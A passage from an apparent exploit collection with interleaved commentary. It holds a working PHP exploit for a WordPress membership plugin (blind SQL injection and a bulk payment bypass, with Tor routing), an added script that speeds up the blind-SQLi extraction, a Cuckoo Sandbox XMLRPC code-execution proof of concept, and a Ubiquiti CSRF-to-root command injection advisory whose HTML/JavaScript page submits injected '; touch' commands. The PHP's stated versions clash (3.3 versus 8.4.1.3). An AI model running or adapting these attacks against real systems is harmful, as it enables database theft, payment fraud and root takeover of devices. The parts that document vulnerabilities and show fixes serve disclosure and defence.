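XT_ENTRY_MATCH_SIZE = 32      # sizeof(struct xt_entry_match)
XT_ENTRY_TARGET_SIZE = 32     # sizeof(struct xt_entry_target)
TARGET_OFFSET_POS = 88        # __u16 target_offset within struct ipt_entry
NEXT_OFFSET_POS = 90          # __u16 next_offset, immediately after it


def check_entry_offsets(entry):
    """Simplified model of the offset validation added by the upstream fix.

    `entry` is the raw bytes of one ipt_entry followed by its matches and
    target. Returns None when the layout is consistent, else a reason string.
    """
    if len(entry) < IPT_ENTRY_SIZE:
        return "blob shorter than struct ipt_entry"
    target_offset, next_offset = struct.unpack_from("<HH", entry, TARGET_OFFSET_POS)

    # 1. the target must start after the fixed-size struct, never inside it
    if target_offset < IPT_ENTRY_SIZE:
        return "target_offset %d points inside struct ipt_entry" % target_offset
    # 2. the target header itself must fit before next_offset
    if target_offset + XT_ENTRY_TARGET_SIZE > next_offset:
        return "target header at %d overruns next_offset %d" % (target_offset, next_offset)
    if next_offset > len(entry):
        return "next_offset %d runs past the supplied data" % next_offset
    # 3. the target's own size must cover its header and stay inside the entry
    (target_size,) = struct.unpack_from("<H", entry, target_offset)
    if target_size < XT_ENTRY_TARGET_SIZE:
        return "target_size %d smaller than the target header" % target_size
    if target_offset + target_size > next_offset:
        return "target %d+%d overruns next_offset %d" % (target_offset, target_size, next_offset)
    # 4. walk the matches between the struct and the target; each must be
    #    at least a header long and must end at or before the target
    pos = IPT_ENTRY_SIZE
    while pos < target_offset:
        if target_offset - pos < XT_ENTRY_MATCH_SIZE:
            return "match header at %d overruns target_offset %d" % (pos, target_offset)
        (match_size,) = struct.unpack_from("<H", entry, pos)
        if match_size < XT_ENTRY_MATCH_SIZE or pos + match_size > target_offset:
            return "match at %d has bogus match_size %d" % (pos, match_size)
        pos += match_size
    return None


def build_entry(target_offset, next_offset, match_size=XT_ENTRY_MATCH_SIZE,
                target_size=XT_ENTRY_TARGET_SIZE + 4):
    """Constructed blob: one ipt_entry, one match record, one standard target,
    laid out the way decr.c fills its buffer (all other bytes zero)."""
    blob = bytearray(max(next_offset, IPT_ENTRY_SIZE))
    struct.pack_into("<HH", blob, TARGET_OFFSET_POS, target_offset, next_offset)
    struct.pack_into("<H", blob, IPT_ENTRY_SIZE, match_size)
    if target_offset + 2 <= len(blob):
        struct.pack_into("<H", blob, target_offset, target_size)
    return bytes(blob)


if __name__ == "__main__":
    cases = {
        "well-formed rule": build_entry(144, 180),
        "decr.c: target_offset inside the struct": build_entry(74, 180),
        "decr.c: match_size 0xffff": build_entry(144, 180, match_size=0xFFFF),
        "target header past next_offset": build_entry(160, 180),
    }
    for label, blob in cases.items():
        print("%-42s -> %s" % (label, check_entry_offsets(blob) or "accepted"))
```

The first check alone defeats decr.c's layout: with target_offset below sizeof(struct ipt_entry) the kernel would otherwise read an attacker-controlled xt_entry_target out of the ipt_ip portion of the entry, and the 0xffff match_size would send the match walk far past the buffer.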
            
<?php
/**
 * Exploit Title: Ultimate Membership Pro WordPress Plugin Exploit
 * Google Dorks: inurl:"lid=0" OR inurl:"lid=1" ...  inurl:"lid=100" "Register" "Confirm Password"
 * Exploit Author: wp0Day.com <contact@wp0day.com>
 * Vendor Homepage: http://wpindeed.com/
 * Software Link: http://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
 * Version: 3.3
 * Tested on: Debian 8, PHP 5.6.17-3
 * Type: Unauthenticated Blind SQLi, Unauthenticated Payment Bypass
 * Timeline: Found [07-Jun-2016], Vendor notified [08-Jun-2016], Vendor fixed: [Yes], [RD:1466846149]
 */


require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();


$options = getopt("t:m:l:e:s:",array('tor:'));
print_r($options);
$options = validateInput($options);

if (!$options){
    showHelp();
}

if ($options['tor'] === true)
{
    echo " ### USING TOR ###\n";
    echo "Setting TOR Proxy...\n";
    $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
    $curl->addOption(CURLOPT_PROXYTYPE,7);
    echo "Checking IPv4 Address\n";
    $curl->get('https://dynamicdns.park-your-domain.com/getip');
    echo "Got IP : ".$curl->getResponse()."\n";
    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
    $answer = fgets(fopen ("php://stdin","r"));
    if(trim($answer) != 'wololo'){
        die("Aborting!\n");
    }
    echo "OK...\n";
}

function isTrue($sql){
    global $curl, $options;
    $levels = "') union all select (SELECT CASE WHEN ($sql) then 1 else 1*(select table_name from information_schema.tables) end)#";
    $data = array(
        'action'=>'ihc_preview_user_listing',
        'shortcode'=>'[ihc-list-users filter_by_level="1" levels_in="'.$levels.'" theme="ihc-theme_1" ]'
    );
    $curl->post(rtrim($options['t'], '/').'/wp-admin/admin-ajax.php', $data);
    $resp = $curl->getResponse();
    return preg_match('~ihc_public_list_users_(\d+)~',$resp);
}

function exploit(){
    global $curl, $options;

    if ($options['m'] == 'pay'){
        $level = $options['l'];
        for($i=$options['s']; $i<$options['e']; $i++){
            //This is mental, no IP or Hash check!
            echo "Paying Level $level to UserID: $i\n";
            $data = array('x_MD5_Hash'=>'1', 'x_response_code'=>'1', 'x_cust_id'=>$i, 'x_po_num'=>$level);
            $curl->post(rtrim($options['t'], '/').'/wp-content/plugins/indeed-membership-pro/authorize_response.php', $data);
            //echo $curl->getResponse();
        }
    }
    if ($options['m'] == 'sql'){
        $query = $options['s'];
        echo "'Running' SQL Query: $query\n";
        echo "Getting Length";
        $max_length = 100;
        //Well, it is messed up: you can't use , (comma) in the query.
        //Binary search (divide et impera) is possible with the BETWEEN operator;
        //code it yourself :)
        $len = 0;
        for ($i=1;$i<$max_length;$i++){
            $sql_len = "(select char_length( ($query) ) = $i )";
            if (isTrue($sql_len)){
                echo "\nLength found: $i\n";
                $len = $i;
                break;
            } else {
                echo ".";
            }
        }
        if ($len !== 0 ){
            echo "Reading char by char\nResponse:\n";
        } else {
            die("Failed getting length!\nAborting.\n\n");
        }
        $charset = 'etaoinsrhdluc@*1234567890.mfywgpbvkxqjzETAOINSRHDLUCMFYWGPBVKXQJZ';
        for ($i=1;$i<=$len;$i++){ // inclusive: the last character must be read too
            $got = false;
            for ($j=0;$j<strlen($charset);$j++){
                $chr = $charset[$j];
                $question = "SELECT substr(($query) FROM $i FOR 1) = '$chr' ";
                if (isTrue($question)){
                    echo $charset[$j];
                    $got = true;
                    break;
                }
            }
            if (!$got){
                echo "?";
            }
        }
        echo "\n\n";

    }
}

exploit();

function validateInput($options){

    if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
        return false;
    }

    if (!isset($options['m']) || !in_array($options['m'], array('sql', 'pay') ) ){
        return false;
    }
    if ($options['m'] == 'sql' && !isset($options['s'])) {
        return false;
    }

    if ($options['m'] == 'pay' && ( !isset($options['s']) || !isset($options['e']) || !isset($options['l']))) {
        return false;
    }
    if ($options['m'] == 'pay' && ( !is_numeric($options['s']) || !is_numeric($options['e']) || !is_numeric($options['l']) )) {
        echo "In pay mode -s -e and -l must be numeric!\n";
        return false;
    }

    $options['tor'] = isset($options['tor']);

    return $options;
}


function showHelp(){
    global $argv;
    $help = <<<EOD

     Ultimate Membership Pro 8.4.1.3 WordPress Plugin Exploit


Usage: php $argv[0] -t [TARGET URL] [--tor=yes] -m [MODE] -s [QUERY or START] -e [END] -l [LEVEL]

       [MODE] sql  - Blind SQL Inject mode*
              pay  - Payment bypass. Parameters -l Level ID (&lid=XX in the url), -s Start UserID, -e End UserID

       *Note: You can't use , (comma) in the query.

Examples:
       php $argv[0] -t http://localhost/ --tor=yes -m sql -s 'select user()'
       php $argv[0] -t http://localhost/ --tor=yes -m pay -s 0 -e 1000 -l 1

       Marks all users with UserID between 0 and 1000 as paying customer for level ID 1

    Misc:
           CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
           @link http://github.com/svyatov/CurlWrapper
           @license http://www.opensource.org/licenses/mit-license.html MIT License

EOD;
    echo $help."\n\n";
    die();
}
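The comment in the PHP above notes that extraction could be made faster with a BETWEEN-based binary search and leaves it as an exercise. The script below is an added example (not wp0Day's code) that does exactly that: it keeps the comma-free probe shape the injection point requires and narrows each character with about seven boolean questions instead of one per charset entry. The exploit's isTrue() oracle is replaced by a constructed local stand-in that answers the same probes against a secret string, so the logic runs offline; against a real target you would point is_true at the admin-ajax.php request instead. Characters outside printable ASCII are reported as "?" rather than misread.

```python
import re

LOW, HIGH = 0x20, 0x7E      # printable ASCII; wide enough for user(), version(), hashes

# Probe shapes: no commas anywhere (the injection point breaks on them), so
# substr() uses the FROM ... FOR form and ranges use BETWEEN.
PROBE_LEN = "char_length((%s)) between %d and %d"
PROBE_CHAR = "ord(substr((%s) from %d for 1)) between %d and %d"


def bisect_value(ask, lo, hi):
    """Find v in [lo, hi] using ask(a, b) == (a <= v <= b) as the only oracle."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(lo, mid):
            hi = mid
        else:
            lo = mid + 1
    return lo


def extract(query, is_true, max_len=100):
    """Recover the scalar result of `query` through a boolean oracle."""
    length = bisect_value(lambda a, b: is_true(PROBE_LEN % (query, a, b)), 0, max_len)
    out = []
    for pos in range(1, length + 1):
        ask = lambda a, b, p=pos: is_true(PROBE_CHAR % (query, p, a, b))
        code = bisect_value(ask, LOW, HIGH)
        # bisect_value converges on HIGH when the real value lies outside the
        # range; confirm the single value before trusting it
        out.append(chr(code) if ask(code, code) else "?")
    return "".join(out)


def make_oracle(secret):
    """Constructed stand-in for the exploit's isTrue(): evaluates the two probe
    shapes above against `secret` and counts how many 'requests' were made."""
    calls = {"n": 0}

    def is_true(condition):
        calls["n"] += 1
        m = re.fullmatch(r"char_length\(\((.*)\)\) between (\d+) and (\d+)", condition)
        if m:
            return int(m.group(2)) <= len(secret) <= int(m.group(3))
        m = re.fullmatch(r"ord\(substr\(\((.*)\) from (\d+) for 1\)\) between (\d+) and (\d+)",
                         condition)
        if m:
            pos, a, b = (int(g) for g in m.group(2, 3, 4))
            return pos <= len(secret) and a <= ord(secret[pos - 1]) <= b
        raise ValueError("unexpected probe: " + condition)

    return is_true, calls


if __name__ == "__main__":
    is_true, calls = make_oracle("root@localhost")
    print(extract("select user()", is_true), "in", calls["n"], "requests")
```

For a 14-character value this costs at most 7 + 14 * 8 requests, against up to 14 * 65 with the sequential charset scan in the PHP; the eighth question per character is the confirmation probe that catches values outside the search range.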
            
# -*- coding: utf8 -*-
"""
# Exploit Title: Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
# Date: June 28th 2016
# Exploit Author: Rémi ROCHER
# Vendor Homepage: https://cuckoosandbox.org/
# Software Link: https://github.com/cuckoosandbox/cuckoo/archive/master.zip
# Version: <= 2.0.1
# Tested on: MS Windows 7, MS Windows 10 (With & without UAC)
# CVE : None

--[ NAME

Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC

--[ DESCRIPTION

Cuckoo Sandbox is Free Software, basically used by researchers to analyze
(potential) malware behavior. It is also implemented industrially by
private companies for detecting potential threats within IT Networks
featuring dedicated so-called security appliances.

This basic proof-of-concept exploit spawns a calc.exe process with
Administrator privileges, assuming:
    * The Cuckoo agent.py is running with Admin privileges (should be
      the case)
    * The current user can access a local interface (should be the case)
    * Optional, for true remote code execution: external equipment can
      access the XMLRPC port (default 8000).

One may also call the complete() method in order to stop any further
detection or screenshots.

Such vulnerabilities can be used either to trick the detection system
itself, or potentially to escape the sandbox machine. An attacker could
also exploit such bugs as a pivot in order to attack sensitive systems.

--[ AUTHORS

* Rémi ROCHER - Armature Technologies
* Thomas MARTHÉLY - Armature Technologies

--[ RESOURCE
* Repository: https://github.com/cuckoosandbox/cuckoo


"""
import xmlrpclib
from StringIO import StringIO
from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED


def execute(x, cmd="cmd /c start"):
    # Build an in-memory zip whose analyzer.py runs the supplied command.
    # The agent unpacks whatever it is given and runs it with its own
    # (Administrator) privileges; no authentication is involved.
    output = StringIO()
    zf = ZipFile(output, "w", ZIP_STORED)
    info = ZipInfo("analyzer.py")
    info.compress_type = ZIP_DEFLATED

    content = ("""
import subprocess

if __name__ == "__main__":
  subprocess.Popen("%s",stdout=subprocess.PIPE,stderr=subprocess.PIPE)

""" % cmd)
    zf.writestr(info, content)
    zf.close()

    data = xmlrpclib.Binary(output.getvalue())

    # add_analyzer() stores the package on the guest; execute() launches it
    if x.add_analyzer(data):
        return x.execute()


if __name__ == "__main__":
    x = xmlrpclib.ServerProxy("http://localhost:8000")
    execute(x, "calc.exe")
    # x.complete() #  Blackout mode
            
<!--
KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution

Title: Ubiquiti Administration Portal CSRF to Remote Command Execution
Advisory ID: KL-001-2016-002
Publication Date: 2016.06.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-002.txt


1. Vulnerability Details

     Affected Vendor: Ubiquiti
     Affected Product: AirGateway, AirFiber, mFi
     Affected Version: 1.1.6, 3.2, 2.1.11
     Platform: Embedded Linux
     CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF);
                         CWE-77: Improper Neutralization of Special Elements
                         used in a Command ('Command Injection')
     Impact: Arbitrary Code Execution
     Attack vector: HTTP

2. Vulnerability Description

     The Ubiquiti AirGateway, AirFiber and mFi platforms feature
     remote administration via an authenticated web-based portal.
     Lack of CSRF protection in the Remote Administration Portal,
     and unsafe passing of user input to operating system commands
     executed with root privileges, can be abused in a way that
     enables remote command execution.

3. Technical Description


     The firmware files analyzed were
     AirGWP.v1.1.6.28062.150731.1520.bin, AF24.v3.2.bin, and
     firmware.bin respectively.

     The MD5 hash values for the vulnerable files served by the
     administration portal are:

     AirGateway b45fe8e491d62251f0a7a100c636178a /usr/www/system.cgi
     AirFiber   d8926f7f65a2111f4036413f985082b9 /usr/www/system.cgi
     mFi        960e8f6e507b227dbc4b65fc7a7036bc /usr/www/system.cgi

     The firmware file contains a LZMA compressed, squashfs
     partition. The binaries running on the embedded device are
     compiled for a MIPS CPU. The device can be easily virtualized
     using QEMU:

     Example: sudo /usr/sbin/chroot . ./qemu-mips-static /usr/sbin/lighttpd
              -f /etc/lighttpd/lighttpd.conf

     The administration portal does not issue a randomized CSRF
     token per session, page, or request. Authorization to the
     administration interface is based solely on the session cookie.
     Therefore, it is possible to embed JavaScript into an HTML page so
     that when an administrator is socially engineered into visiting
     the page, the target device is accessed with that administrator's
     privileges.

     Device configuration POST parameters include tokens passed to
     operating system commands run as root in unsafe ways with
     insufficient input sanitization.  Command injection is possible
     by stacking shell commands in parameters such as
     iptables.1.cmd.
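     The root cause in the paragraph above is that a configuration value
     such as iptables.1.cmd reaches a root shell verbatim. The following
     is an added illustration of what the input-handling side of the fix
     looks like; it is not Ubiquiti firmware code (which is native), and
     the allowlist of flags is an assumption for the example. The idea:
     reject shell metacharacters, tokenise, check every token against a
     strict allowlist, and build an argv list so the rule can be executed
     without a shell at all. It is run over a constructed configuration
     excerpt that contains the advisory's injected line.

```python
import re
import shlex

# Assumed allowlist: the flags a firewall rule written by the web UI may contain
ALLOWED_FLAGS = {"-A", "-I", "-D", "-p", "-s", "-d", "-i", "-o", "-j", "-m",
                 "--dport", "--sport", "--state"}
WORD = re.compile(r"^[A-Za-z0-9_.:/,-]+$")          # chains, protocols, CIDRs, port lists
SHELL_META = re.compile(r"[;&|`$<>(){}\\\"'\n]")     # anything that lets a shell do more
CMD_KEY = re.compile(r"^iptables\.\d+\.cmd$")


def validate_iptables_cmd(value):
    """Turn an iptables.N.cmd value into an argv list, or raise ValueError.

    Vulnerable pattern being replaced: system("iptables " + value) as root,
    where ';' in the value starts a second command.
    """
    if SHELL_META.search(value):
        raise ValueError("shell metacharacter in rule: %r" % value)
    tokens = shlex.split(value)
    if not tokens or tokens[0] not in ("-A", "-I", "-D"):
        raise ValueError("rule must start with -A, -I or -D")
    for tok in tokens:
        if tok.startswith("-"):
            if tok not in ALLOWED_FLAGS:
                raise ValueError("flag not permitted: %s" % tok)
        elif not WORD.match(tok):
            raise ValueError("bad argument: %r" % tok)
    return ["iptables"] + tokens      # pass to an exec-style API, never to a shell


def check_config(text):
    """Validate every iptables.N.cmd line of a key=value config dump.

    Returns ({key: argv} for accepted rules, {key: reason} for rejected ones).
    """
    accepted, rejected = {}, {}
    for line in text.splitlines():
        if "=" not in line or line.startswith("#"):
            continue
        key, value = line.split("=", 1)
        if not CMD_KEY.match(key.strip()):
            continue
        try:
            accepted[key] = validate_iptables_cmd(value.strip())
        except ValueError as exc:
            rejected[key] = str(exc)
    return accepted, rejected


# Constructed config excerpt: the stock rule, a legitimate variant, the
# advisory's injected line, and a rule using a flag outside the allowlist
SAMPLE_CONFIG = """\
iptables.status=enabled
iptables.1.cmd=-A FIREWALL -j ACCEPT
iptables.2.cmd=-A FIREWALL -p tcp --dport 22 -j ACCEPT
iptables.3.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt
iptables.4.cmd=-A FIREWALL -j ACCEPT --log-prefix x
"""

if __name__ == "__main__":
    ok, bad = check_config(SAMPLE_CONFIG)
    for key, argv in ok.items():
        print("accepted", key, "->", argv)
    for key, why in bad.items():
        print("rejected", key, "->", why)
```

     Validation on its own does not close the CSRF half of the chain; the
     portal still needs a per-session token on state-changing requests.
     It does remove the root command execution that turns a forged
     request into code execution.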

     To reproduce this finding, follow the steps below.

     a. Authenticate to the target web application and navigate to the
        SYSTEM page.
     b. Download the current configuration.
     c. Open the configuration in an editor of your choice, navigate to the
        line containing: iptables.1.cmd=-A FIREWALL -j ACCEPT
     d. Append the following onto that line: ;touch /var/tmp/csrf-to-rce.txt
     e. Save the changes, and submit the modified configuration. Apply the
        changes using apply.cgi afterward.

        Example:

         POST /system.cgi HTTP/1.1
         Host: 192.168.1.1
         User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0)
         Gecko/20100101 Firefox/43.0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;
         q=0.8
         Accept-Language: en-US,en;q=0.5
         Accept-Encoding: gzip, deflate
         DNT: 1
         Referer: https://192.168.1.1/system.cgi
         Cookie: ui_language=en_US; last_check=1452020493426;
         AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
         Connection: keep-alive
         Content-Type: multipart/form-data;
         boundary=---------------------------4384928471732886672453075690
         Content-Length: 7204

         ...
         iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt
         ...

         GET /apply.cgi?testmode=&_=[redacted] HTTP/1.1
         Host: 192.168.1.1
         X-Requested-With: XMLHttpRequest
         Referer: https://192.168.1.1/system.cgi
         Cookie: ui_language=en_US; last_check=1452020493426;
         AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
         Connection: keep-alive

     f. Change your IP address, but ensure continued routing to the target web
        application. Incrementing the last octet is sufficient.
     g. Open the configuration in an editor of your choice, navigate to the
        modified line and alter it: ;touch /var/tmp/csrf-to-rce-newsrc.txt
     h. Repeat step e from the new IP address. You will receive the same
        response. Apply the changes using the apply.cgi file.
     i. Log in to the target device using SSH or telnet, navigate to /var/tmp
        and type ls.
     j. You'll discover both files exist.

4. Mitigation and Remediation Recommendation

     At this time there is no vendor patch for this vulnerability.
     The vendor was unable or unwilling to communicate an expected release
     date for a proper mitigation.

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2016.02.25 - KoreLogic sends vulnerability report and PoC to Ubiquiti.
     2016.02.26 - Ubiquiti acknowledges receipt of vulnerability report.
     2016.04.12 - 30 business days have elapsed since the vulnerability was
                  reported to Ubiquiti.
     2016.04.21 - KoreLogic asks for an update on the remediation effort.
     2016.04.29 - Ubiquiti replies that the patch will require
                  "significant changes" but does not provide an estimate
                  of the release time table.
     2016.05.04 - 45 business days have elapsed since the vulnerability was
                  reported to Ubiquiti.
     2016.05.12 - KoreLogic requests an update from Ubiquiti.
     2016.05.23 - KoreLogic requests an update from Ubiquiti.
     2016.06.23 - 80 business days have elapsed since the vulnerability was
                  reported to Ubiquiti.
     2016.06.28 - Public disclosure.

7. Proof of Concept

     ########################################################################
     #
     # Copyright 2016 KoreLogic Inc., All Rights Reserved.
     #
     # This proof of concept, having been partly or wholly developed
     # and/or sponsored by KoreLogic, Inc., is hereby released under
     # the terms and conditions set forth in the Creative Commons
     # Attribution Share-Alike 4.0 (United States) License:
     #
     #   http://creativecommons.org/licenses/by-sa/4.0/
     #
     ########################################################################

     This example has been performed against the AirGateway device running the
     1.1.6 firmware version. In order to recreate this vulnerability on
     AirFiber and mFi, the attacker should first obtain a valid copy of the
     device configuration and update this proof-of-concept code.
-->

<html>
  <body>
    <form action="https://192.168.1.1/apply.cgi" id="airos-exploit-apply">
      <input type="submit" value="Submit request" />
    </form>

    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://192.168.1.1/system.cgi", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------761818923593135447208368355");
        xhr.withCredentials = true;
        var body = "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"fwfile\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"action\"\r\n" + 
          "\r\n" + 
          "fwupload\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"update_status\"\r\n" + 
          "\r\n" + 
          "enabled\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"hostname\"\r\n" + 
          "\r\n" + 
          "airGateway\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"timezone\"\r\n" + 
          "\r\n" + 
          "GMT\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"ui_language\"\r\n" + 
          "\r\n" + 
          "en_US\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"adminname\"\r\n" + 
          "\r\n" + 
          "ubnt\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"latitude\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"longitude\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"longitude\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------761818923593135447208368355\r\n" + 
          "Content-Disposition: form-data; name=\"cfgfile\"; filename=\"hacked.cfg\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "aaa.1.radius.acct.1.status=disabled\n" + 
          "wpasupplicant.status=disabled\n" + 
          "wpasupplicant.device.1.status=disabled\n" + 
          "wireless.status=enabled\n" + 
          "wireless.1.wds.status=disabled\n" + 
          "wireless.1.wds.6.peer=\n" + 
          "wireless.1.wds.5.peer=\n" + 
          "wireless.1.wds.4.peer=\n" + 
          "wireless.1.wds.3.peer=\n" + 
          "wireless.1.wds.2.peer=\n" + 
          "wireless.1.wds.1.peer=\n" + 
          "wireless.1.status=enabled\n" + 
          "wireless.1.ssid=www.ubnt.com\n" + 
          "wireless.1.security.type=none\n" + 
          "wireless.1.scan_list.status=disabled\n" + 
          "wireless.1.mac_acl.policy=allow\n" + 
          "wireless.1.mac_acl.status=disabled\n" + 
          "wireless.1.hide_ssid=disabled\n" + 
          "wireless.1.devname=ath0\n" + 
          "wireless.1.autowds=disabled\n" + 
          "wireless.1.authmode=1\n" + 
          "wireless.1.ap=\n" + 
          "wireless.1.addmtikie=enabled\n" + 
          "vlan.status=disabled\n" + 
          "users.status=enabled\n" + 
          "users.1.status=enabled\n" + 
          "users.1.password=VvpvCwhccFv6Q\n" + 
          "users.1.name=ubnt\n" + 
          "upnpd.devname=\n" + 
          "upnpd.status=disabled\n" + 
          "tshaper.status=disabled\n" + 
          "telnetd.status=enabled\n" + 
          "telnetd.port=23\n" + 
          "system.modules.blacklist.status=disabled\n" + 
          "system.eirp.status=disabled\n" + 
          "system.cfg.version=65542\n" + 
          "syslog.status=disabled\n" + 
          "syslog.remote.status=\n" + 
          "sshd.status=enabled\n" + 
          "sshd.port=22\n" + 
          "sshd.auth.passwd=enabled\n" + 
          "snmp.status=disabled\n" + 
          "route.1.devname=eth0\n" + 
          "route.1.status=disabled\n" + 
          "route.1.comment=\n" + 
          "route.1.gateway=0.0.0.0\n" + 
          "route.1.netmask=0\n" + 
          "route.1.ip=0.0.0.0\n" + 
          "route.status=enabled\n" + 
          "resolv.nameserver.2.status=enabled\n" + 
          "resolv.nameserver.2.ip=\n" + 
          "resolv.nameserver.1.status=enabled\n" + 
          "resolv.nameserver.1.ip=\n" + 
          "resolv.status=disabled\n" + 
          "radio.status=enabled\n" + 
          "radio.countrycode=840\n" + 
          "radio.1.txpower=18\n" + 
          "radio.1.subsystemid=0xe4c2\n" + 
          "radio.1.status=enabled\n" + 
          "radio.1.reg_obey=disabled\n" + 
          "radio.1.rate.mcs=7\n" + 
          "radio.1.rate.auto=enabled\n" + 
          "radio.1.obey=disabled\n" + 
          "radio.1.mode=master\n" + 
          "radio.1.mcastrate=\n" + 
          "radio.1.low_txpower_mode=disabled\n" + 
          "radio.1.ieee_mode=11nght20\n" + 
          "radio.1.freq=0\n" + 
          "radio.1.forbiasauto=1\n" + 
          "radio.1.dfs.status=enabled\n" + 
          "radio.1.devname=ath0\n" + 
          "radio.1.cwm.mode=0\n" + 
          "radio.1.cwm.enable=0\n" + 
          "radio.1.countrycode=840\n" + 
          "radio.1.clksel=1\n" + 
          "radio.1.chanshift=\n" + 
          "radio.1.chanbw=0\n" + 
          "radio.1.antenna.id=4\n" + 
          "radio.1.acktimeout=25\n" + 
          "radio.1.ackdistance=600\n" + 
          "pwdog.status=enabled\n" + 
          "pwdog.retry=3\n" + 
          "pwdog.period=300\n" + 
          "pwdog.host=8.8.8.8\n" + 
          "pwdog.delay=300\n" + 
          "ppp.status=disabled\n" + 
          "ntpclient.status=enabled\n" + 
          "ntpclient.1.status=enabled\n" + 
          "ntpclient.1.server=0.ubnt.pool.ntp.org\n" + 
          "netmode=soho\n" + 
          "netconf.5.up=enabled\n" + 
          "netconf.5.hwaddr.mac=\n" + 
          "netconf.5.hwaddr.status=disabled\n" + 
          "netconf.5.autoip.status=disabled\n" + 
          "netconf.5.role=mlan\n" + 
          "netconf.5.mtu=1500\n" + 
          "netconf.5.devname=eth0\n" + 
          "netconf.5.status=disabled\n" + 
          "netconf.4.up=enabled\n" + 
          "netconf.4.netmask=255.255.255.0\n" + 
          "netconf.4.ip=0.0.0.0\n" + 
          "netconf.4.hwaddr.mac=\n" + 
          "netconf.4.hwaddr.status=disabled\n" + 
          "netconf.4.autoip.status=disabled\n" + 
          "netconf.4.role=bridge_port\n" + 
          "netconf.4.mtu=1500\n" + 
          "netconf.4.devname=eth1\n" + 
          "netconf.4.status=enabled\n" + 
          "netconf.3.up=enabled\n" + 
          "netconf.3.netmask=255.255.255.0\n" + 
          "netconf.3.ip=192.168.1.1\n" + 
          "netconf.3.hwaddr.mac=\n" + 
          "netconf.3.hwaddr.status=disabled\n" + 
          "netconf.3.autoip.status=disabled\n" + 
          "netconf.3.role=lan\n" + 
          "netconf.3.mtu=1500\n" + 
          "netconf.3.devname=br0\n" + 
          "netconf.3.status=enabled\n" + 
          "netconf.2.up=enabled\n" + 
          "netconf.2.promisc=enabled\n" + 
          "netconf.2.netmask=255.255.255.0\n" + 
          "netconf.2.ip=0.0.0.0\n" + 
          "netconf.2.hwaddr.mac=\n" + 
          "netconf.2.hwaddr.status=disabled\n" + 
          "netconf.2.autoip.status=disabled\n" + 
          "netconf.2.role=bridge_port\n" + 
          "netconf.2.mtu=1500\n" + 
          "netconf.2.devname=ath0\n" + 
          "netconf.2.status=enabled\n" + 
          "netconf.1.up=enabled\n" + 
          "netconf.1.promisc=enabled\n" + 
          "netconf.1.netmask=255.255.255.0\n" + 
          "netconf.1.ip=0.0.0.0\n" + 
          "netconf.1.hwaddr.mac=\n" + 
          "netconf.1.hwaddr.status=disabled\n" + 
          "netconf.1.autoip.status=disabled\n" + 
          "netconf.1.role=wan\n" + 
          "netconf.1.mtu=1500\n" + 
          "netconf.1.devname=eth0\n" + 
          "netconf.1.status=enabled\n" + 
          "netconf.status=enabled\n" + 
          "iptables.sys.upnpd.devname=\n" + 
          "iptables.sys.upnpd.status=disabled\n" + 
          "iptables.sys.status=enabled\n" + 
          "iptables.sys.portfw.status=disabled\n" + 
          "iptables.sys.mgmt.status=disabled\n" + 
          "iptables.sys.masq.1.status=enabled\n" + 
          "iptables.sys.masq.1.devname=eth0\n" + 
          "iptables.sys.masq.status=enabled\n" + 
          "iptables.sys.fw.status=disabled\n" + 
          "iptables.sys.dmz.status=disabled\n" + 
          "iptables.1.comment=\n" + 
          "iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/hacked.txt\n" + 
          "iptables.1.status=enabled\n" + 
          "iptables.status=enabled\n" + 
          "igmpproxy.status=enabled\n" + 
          "igmpproxy.upstream.devname=eth0\n" + 
          "igmpproxy.1.downstream.devname=br0\n" + 
          "httpd.status=enabled\n" + 
          "httpd.session.timeout=900\n" + 
